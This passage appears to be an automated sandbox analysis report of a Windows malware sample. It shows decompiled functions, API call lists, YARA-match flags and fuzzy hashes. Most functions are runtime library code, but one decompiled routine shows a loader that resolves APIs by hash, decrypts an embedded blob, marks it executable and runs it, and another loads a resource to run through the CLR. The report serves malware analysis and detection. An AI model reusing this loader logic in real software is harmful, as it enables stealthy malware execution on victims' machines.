                                        				if(_t49 != 0) {
                                        					 *_t49 = 0;
                                        				}
                                        				goto L5;
                                        			}

















                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0009F42C
                                        • __isleadbyte_l.LIBCMT ref: 0009F45A
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0009F488
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0009F4BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 3df1b00145f12a4512da01488e1d6a11e37ff5d115a60e4c71a3c1b68d74b90c
                                        • Instruction ID: 7f8a3c4fb2c549e0fe49e2a640808703a2f57b49dcae0c383259daf0d6299c63
                                        • Opcode Fuzzy Hash: 3df1b00145f12a4512da01488e1d6a11e37ff5d115a60e4c71a3c1b68d74b90c
                                        • Instruction Fuzzy Hash: 8F318A31604247ABDF218E65D884BBB7BF5FF41320F158539E864DB1A1E730E891EBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E000987A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr* _t24;
                                        				void* _t28;
                                        				intOrPtr* _t40;
                                        				void* _t41;
                                        
                                        				_push(0xc);
                                        				_push(0xacf38);
                                        				E000927F0(__ebx, __edi, __esi);
                                        				_t28 = E000915FE();
                                        				_t40 = E000932EE(8, 1);
                                        				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
                                        				_t43 = _t40;
                                        				if(_t40 != 0) {
                                        					E000936DB(_t28, __edx, 1, _t40, __eflags);
                                        					E00093AF6(_t28, __edx, 1, _t40, __eflags);
                                        					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
                                        					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
                                        					E00093117(0xc);
                                        					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                        					E0009344C( *_t40);
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E00098E70();
                                        					E00093117(0xd);
                                        					 *(_t41 - 4) = 1;
                                        					asm("lock xadd [eax], edi");
                                        					__eflags = 2;
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E00098E7C();
                                        					_t24 = _t40;
                                        				} else {
                                        					 *((intOrPtr*)(E00094196(_t43))) = 0xc;
                                        					_t24 = 0;
                                        				}
                                        				return E00092835(_t24);
                                        			}








                                        APIs
                                          • Part of subcall function 000915FE: __getptd_noexit.LIBCMT ref: 000915FF
                                          • Part of subcall function 000915FE: __amsg_exit.LIBCMT ref: 0009160C
                                        • __calloc_crt.LIBCMT ref: 00098DEF
                                          • Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD
                                        • __lock.LIBCMT ref: 00098E25
                                        • ___addlocaleref.LIBCMT ref: 00098E31
                                        • __lock.LIBCMT ref: 00098E45
                                          • Part of subcall function 00094196: __getptd_noexit.LIBCMT ref: 00094196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                        • String ID:
                                        • API String ID: 2580527540-0
                                        • Opcode ID: dd3769bbd20fc9da5bd2df8bec4adecbc9aab997d8f80dd9a327ca0fdac26da6
                                        • Instruction ID: d65d612fa01061dc693ace4b5ae9497124216b101f9e1fde085a9191db80e57c
                                        • Opcode Fuzzy Hash: dd3769bbd20fc9da5bd2df8bec4adecbc9aab997d8f80dd9a327ca0fdac26da6
                                        • Instruction Fuzzy Hash: C0014031605301ABDF20BFB89903B9E77E0AF85720F118149F4559B3D3DE745E41AB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000A2F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                        				intOrPtr _t25;
                                        				void* _t26;
                                        
                                        				_t25 = _a16;
                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                        					_t26 = E000A34F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        					goto L9;
                                        				} else {
                                        					_t35 = _t25 - 0x66;
                                        					if(_t25 != 0x66) {
                                        						__eflags = _t25 - 0x61;
                                        						if(_t25 == 0x61) {
                                        							L7:
                                        							_t26 = E000A3025(_a4, _a8, _a12, _a20, _a24, _a28);
                                        						} else {
                                        							__eflags = _t25 - 0x41;
                                        							if(__eflags == 0) {
                                        								goto L7;
                                        							} else {
                                        								_t26 = E000A37A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        							}
                                        						}
                                        						L9:
                                        						return _t26;
                                        					} else {
                                        						return E000A36C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                        					}
                                        				}
                                        			}






                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction ID: 6b66d0d94d8bd47282ee870131df05e36bfc81e154958616fb2ecbfa8cdeb90a
                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction Fuzzy Hash: 38014B7200014ABFCF665EC8DC02CEE3F76BF1A354B598425FA1858132D236CAB1AB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 000B2892
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 000B2897
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 000B289C
                                          • Part of subcall function 000B2AB1: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 000B2AC2
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 000B28B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction ID: 076e88ccc9718437c575008777e8cab2d03416b5f3964c490b9f577175bbfb93
                                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction Fuzzy Hash: 51C09208412220932CB03FB0322B2EE23804FF77C8BEB28C2BC4127503CE0A450BA833
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ___free_lconv_mon
                                        • String ID: X&A$h&A
                                        • API String ID: 3903695350-2460073903
                                        • Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction ID: 557f82db5e1bbd8a4c032ae3f52a115d9b52837dead3413397cda5a1ce4e617c
                                        • Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction Fuzzy Hash: 09317C31A04701AFEB70AA78D845BDAB3F8EF00710F144929E959D7192DF3AED948B10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E000986D1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t4;
                                        				void* _t15;
                                        				void* _t17;
                                        
                                        				_push(8);
                                        				_push(0xacfc0);
                                        				_t4 = E000927F0(__ebx, __edi, __esi);
                                        				_t17 =  *0xae2e4 - 0xae2e8; // 0xae2e8
                                        				if(_t17 != 0) {
                                        					E00093117(0xc);
                                        					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
                                        					 *0xae2e4 = E0009375B("��", 0xae2e8);
                                        					 *(_t15 - 4) = 0xfffffffe;
                                        					_t4 = E0009871A();
                                        				}
                                        				return E00092835(_t4);
                                        			}







                                        APIs
                                        • __lock.LIBCMT ref: 000986EC
                                          • Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
                                          • Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
                                          • Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 000986FC
                                          • Part of subcall function 0009375B: ___addlocaleref.LIBCMT ref: 00093777
                                          • Part of subcall function 0009375B: ___removelocaleref.LIBCMT ref: 00093782
                                          • Part of subcall function 0009375B: ___freetlocinfo.LIBCMT ref: 00093796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__amsg_exit__lock__mtinitlocknum__updatetlocinfo
                                        • String ID:
                                        • API String ID: 236788210-2599400749
                                        • Opcode ID: 56d8877799b0669b77fb8b5540cf9d49b1b70e3c8cfed34379f379e2a7dbfaaf
                                        • Instruction ID: 6fe879db6dbd93f9d9499297c198aab8f3acdae90320a32ca93300a83fd796fe
                                        • Opcode Fuzzy Hash: 56d8877799b0669b77fb8b5540cf9d49b1b70e3c8cfed34379f379e2a7dbfaaf
                                        • Instruction Fuzzy Hash: 6FE0CD3154E751EEFE14F7E0D907BCCAA545B03B21F204157F104651C3CE780600A75A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        C-Code - Quality: 100%
                                        			E00401489() {
                                        				void* _v8;
                                        				struct HRSRC__* _t4;
                                        				long _t10;
                                        				struct HRSRC__* _t12;
                                        				void* _t16;
                                        
                                        				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                                        				_t12 = _t4;
                                        				if(_t12 == 0) {
                                        					L6:
                                        					ExitProcess(0);
                                        				}
                                        				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                        				if(_t16 != 0) {
                                        					_v8 = LockResource(_t16);
                                        					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                        					_t13 = _v8;
                                        					if(_v8 != 0 && _t10 != 0) {
                                        						L00401000(_t13, _t10); // executed
                                        					}
                                        				}
                                        				FreeResource(_t16);
                                        				goto L6;
                                        			}









                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                        • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                        • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                        • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                        • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                          • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                        • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                        • ExitProcess.KERNEL32 ref: 004014EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                        • String ID: v4.0.30319
                                        • API String ID: 2372384083-3152434051
                                        • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                        • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                        • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                        • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00401E1D() {
                                        				_Unknown_base(*)()* _t1;
                                        
                                        				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                                        				return _t1;
                                        			}




                                        APIs
                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004055C5(void* __ecx) {
                                        				void* _t6;
                                        				void* _t14;
                                        				void* _t18;
                                        				WCHAR* _t19;
                                        
                                        				_t14 = __ecx;
                                        				_t19 = GetEnvironmentStringsW();
                                        				if(_t19 != 0) {
                                        					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                                        					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                                        					_t18 = _t6;
                                        					if(_t18 != 0) {
                                        						E0040ACF0(_t18, _t19, _t12);
                                        					}
                                        					E00403E03(0);
                                        					FreeEnvironmentStringsW(_t19);
                                        				} else {
                                        					_t18 = 0;
                                        				}
                                        				return _t18;
                                        			}







                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: EnvironmentStrings$Free
                                        • String ID:
                                        • API String ID: 3328510275-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E00403E3D(void* __ecx, long _a4) {
                                        				void* _t4;
                                        				void* _t6;
                                        				void* _t7;
                                        				long _t8;
                                        
                                        				_t7 = __ecx;
                                        				_t8 = _a4;
                                        				if(_t8 > 0xffffffe0) {
                                        					L7:
                                        					 *((intOrPtr*)(E00404831())) = 0xc;
                                        					__eflags = 0;
                                        					return 0;
                                        				}
                                        				if(_t8 == 0) {
                                        					_t8 = _t8 + 1;
                                        				}
                                        				while(1) {
                                        					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                                        					if(_t4 != 0) {
                                        						break;
                                        					}
                                        					__eflags = E00403829();
                                        					if(__eflags == 0) {
                                        						goto L7;
                                        					}
                                        					_t6 = E004068FD(_t7, __eflags, _t8);
                                        					_pop(_t7);
                                        					__eflags = _t6;
                                        					if(_t6 == 0) {
                                        						goto L7;
                                        					}
                                        				}
                                        				return _t4;
                                        			}







                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 100%
                                        			E0009E84E(short _a4, intOrPtr _a8) {
                                        				short _t13;
                                        				short _t28;
                                        
                                        				_t28 = _a4;
                                        				if(_t28 != 0 &&  *_t28 != 0 && E0009DB06(_t28, ?str?) != 0) {
                                        					if(E0009DB06(_t28, ?str?) != 0) {
                                        						return E0009FA26(_t28);
                                        					}
                                        					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                        						L9:
                                        						return 0;
                                        					}
                                        					return _a4;
                                        				}
                                        				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                        					goto L9;
                                        				}
                                        				_t13 = _a4;
                                        				if(_t13 == 0) {
                                        					return GetACP();
                                        				}
                                        				return _t13;
                                        			}





                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0009EB14,?,00000000), ref: 0009E892
                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0009EB14,?,00000000), ref: 0009E8BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E000A7800(void* __ebx, void* __esi, void* __eflags) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				long _v16;
                                        				char _v18;
                                        				short _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				char _v30;
                                        				short _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				void* __edi;
                                        				intOrPtr* _t40;
                                        				intOrPtr* _t43;
                                        				intOrPtr* _t48;
                                        				void* _t49;
                                        				signed char _t50;
                                        				intOrPtr* _t56;
                                        				void* _t85;
                                        				void* _t87;
                                        
                                        				_v28 = 0x72657355;
                                        				_v24 = 0x642e3233;
                                        				_v20 = 0x6c6c;
                                        				_v18 = 0;
                                        				_v40 = 0x72637052;
                                        				_v36 = 0x642e3474;
                                        				_v32 = 0x6c6c;
                                        				_v30 = 0;
                                        				_t56 = E000A7950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
                                        				_t12 =  &_v28; // 0x72657355
                                        				_v8 = E000A7950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
                                        				_t40 = E000A7950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
                                        				_t17 =  &_v28; // 0x72657355
                                        				_t43 = E000A7950( *_t56(_t17), 0xc7e6f44f);
                                        				 *_t43( *_t40(0));
                                        				_t18 =  &_v40; // 0x72637052
                                        				_t48 = E000A7950( *_t56(_t18), 0x958d1c17);
                                        				_t49 =  *_t48(2, 0, 1, 0,  &_v12);
                                        				_t87 = 0;
                                        				if(_t49 != 0 && _t49 == 0x57) {
                                        					_t50 = 0;
                                        					do {
                                        						_t20 = 0xaf0d0 + _t50; // 0xcbf195bd
                                        						asm("rol dl, 0x2");
                                        						asm("ror dl, 0x3");
                                        						 *(0xaf0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
                                        						_t50 = _t50 + 1;
                                        					} while (_t50 < 0x1e05);
                                        					VirtualProtect(0xaf0d0, 0x1e05, 0x40,  &_v16);
                                        					_v8(0xaf0d0, 0xb0ed8, 0, 0, 0);
                                        					return E000A7D10(_t87);
                                        				}
                                        				return _t49;
                                        			}























                                        APIs
                                        • VirtualProtect.KERNEL32(000AF0D0,00001E05,00000040,?), ref: 000A792C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID: Rpcrt4.dllUser32.dll$User32.dll
                                        • API String ID: 544645111-2494872352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E00404A29(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                        				intOrPtr _v8;
                                        				signed int _v12;
                                        				intOrPtr _v28;
                                        				signed int _v32;
                                        				WCHAR* _v36;
                                        				signed int _v48;
                                        				intOrPtr _v556;
                                        				intOrPtr _v558;
                                        				struct _WIN32_FIND_DATAW _v604;
                                        				intOrPtr* _v608;
                                        				signed int _v612;
                                        				signed int _v616;
                                        				intOrPtr _v644;
                                        				intOrPtr _v648;
                                        				void* __edi;
                                        				signed int _t40;
                                        				signed int _t45;
                                        				signed int _t48;
                                        				signed int _t50;
                                        				signed int _t51;
                                        				signed char _t53;
                                        				signed int _t62;
                                        				void* _t64;
                                        				union _FINDEX_INFO_LEVELS _t66;
                                        				union _FINDEX_INFO_LEVELS _t67;
                                        				signed int _t70;
                                        				intOrPtr* _t71;
                                        				signed int _t74;
                                        				void* _t80;
                                        				void* _t82;
                                        				signed int _t83;
                                        				void* _t87;
                                        				WCHAR* _t88;
                                        				intOrPtr* _t92;
                                        				intOrPtr _t95;
                                        				void* _t97;
                                        				signed int _t98;
                                        				intOrPtr* _t102;
                                        				signed int _t105;
                                        				void* _t108;
                                        				intOrPtr _t109;
                                        				void* _t110;
                                        				void* _t112;
                                        				void* _t113;
                                        				signed int _t115;
                                        				void* _t116;
                                        				union _FINDEX_INFO_LEVELS _t117;
                                        				void* _t121;
                                        				void* _t122;
                                        				void* _t123;
                                        				signed int _t124;
                                        				void* _t125;
                                        				signed int _t130;
                                        				void* _t131;
                                        				signed int _t132;
                                        				void* _t133;
                                        				void* _t134;
                                        
                                        				_push(__ecx);
                                        				_t92 = _a4;
                                        				_t2 = _t92 + 2; // 0x2
                                        				_t108 = _t2;
                                        				do {
                                        					_t40 =  *_t92;
                                        					_t92 = _t92 + 2;
                                        				} while (_t40 != 0);
                                        				_t115 = _a12;
                                        				_t95 = (_t92 - _t108 >> 1) + 1;
                                        				_v8 = _t95;
                                        				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
                                        					_t5 = _t115 + 1; // 0x1
                                        					_t87 = _t5 + _t95;
                                        					_t122 = E00403ECE(_t95, _t87, 2);
                                        					_t97 = _t121;
                                        					__eflags = _t115;
                                        					if(_t115 == 0) {
                                        						L6:
                                        						_push(_v8);
                                        						_t87 = _t87 - _t115;
                                        						_t45 = E004047AD(_t97, _t122 + _t115 * 2, _t87, _a4);
                                        						_t132 = _t131 + 0x10;
                                        						__eflags = _t45;
                                        						if(__eflags != 0) {
                                        							goto L9;
                                        						} else {
                                        							_t80 = E00404CA2(_a16, __eflags, _t122);
                                        							E00403E03(0);
                                        							_t82 = _t80;
                                        							goto L8;
                                        						}
                                        					} else {
                                        						_push(_t115);
                                        						_t83 = E004047AD(_t97, _t122, _t87, _a8);
                                        						_t132 = _t131 + 0x10;
                                        						__eflags = _t83;
                                        						if(_t83 != 0) {
                                        							L9:
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							E00404649();
                                        							asm("int3");
                                        							_t130 = _t132;
                                        							_t133 = _t132 - 0x260;
                                        							_t48 =  *0x412014; // 0x2327c9ba
                                        							_v48 = _t48 ^ _t130;
                                        							_t109 = _v28;
                                        							_t98 = _v32;
                                        							_push(_t87);
                                        							_t88 = _v36;
                                        							_push(_t122);
                                        							_push(_t115);
                                        							_t123 = 0x5c;
                                        							_v644 = _t109;
                                        							_v648 = 0x2f;
                                        							_t116 = 0x3a;
                                        							while(1) {
                                        								__eflags = _t98 - _t88;
                                        								if(_t98 == _t88) {
                                        									break;
                                        								}
                                        								_t50 =  *_t98 & 0x0000ffff;
                                        								__eflags = _t50 - _v612;
                                        								if(_t50 != _v612) {
                                        									__eflags = _t50 - _t123;
                                        									if(_t50 != _t123) {
                                        										__eflags = _t50 - _t116;
                                        										if(_t50 != _t116) {
                                        											_t98 = _t98 - 2;
                                        											__eflags = _t98;
                                        											continue;
                                        										}
                                        									}
                                        								}
                                        								break;
                                        							}
                                        							_t124 =  *_t98 & 0x0000ffff;
                                        							__eflags = _t124 - _t116;
                                        							if(_t124 != _t116) {
                                        								L19:
                                        								_t51 = _t124;
                                        								_t117 = 0;
                                        								_t110 = 0x2f;
                                        								__eflags = _t51 - _t110;
                                        								if(_t51 == _t110) {
                                        									L23:
                                        									_t53 = 1;
                                        									__eflags = 1;
                                        								} else {
                                        									_t112 = 0x5c;
                                        									__eflags = _t51 - _t112;
                                        									if(_t51 == _t112) {
                                        										goto L23;
                                        									} else {
                                        										_t113 = 0x3a;
                                        										__eflags = _t51 - _t113;
                                        										if(_t51 == _t113) {
                                        											goto L23;
                                        										} else {
                                        											_t53 = 0;
                                        										}
                                        									}
                                        								}
                                        								_t101 = (_t98 - _t88 >> 1) + 1;
                                        								asm("sbb eax, eax");
                                        								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
                                        								E00402460(_t117,  &_v604, _t117, 0x250);
                                        								_t134 = _t133 + 0xc;
                                        								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
